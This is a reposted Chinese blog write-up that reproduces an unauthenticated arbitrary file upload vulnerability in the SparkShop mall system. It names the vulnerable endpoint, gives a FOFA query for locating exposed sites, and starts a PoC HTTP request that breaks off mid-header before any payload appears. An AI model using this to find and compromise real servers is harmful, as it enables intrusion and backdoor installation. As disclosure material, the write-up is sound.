0


SparkShop开源商城 uploadFile 任意文件上传漏洞复现

0x01 产品简介

SparkShop开源商城(也被称为星火商城)是一款基于ThinkPHP6和Element UI的开源免费可商用的高性能商城系统。适用于各类电商场景,包括但不限于B2C商城、新零售、分销商城等。无论是初创企业还是成熟品牌,都可以通过SparkShop快速搭建个性化独立商城,实现线上线下的融合营销。

0x02 漏洞概述

SparkShop开源商城 uploadFile 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

FOFA:"SparkShop"

0x04 漏洞复现

PoC

POST /api/Common/uploadFile HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,a
标签: 安全 web安全

本文转载自: https://blog.csdn.net/qq_41904294/article/details/141558437
版权归原作者 0xSecl 所有, 如有侵权,请联系我们删除。

“SparkShop开源商城 uploadFile 任意文件上传漏洞复现”的评论:

还没有评论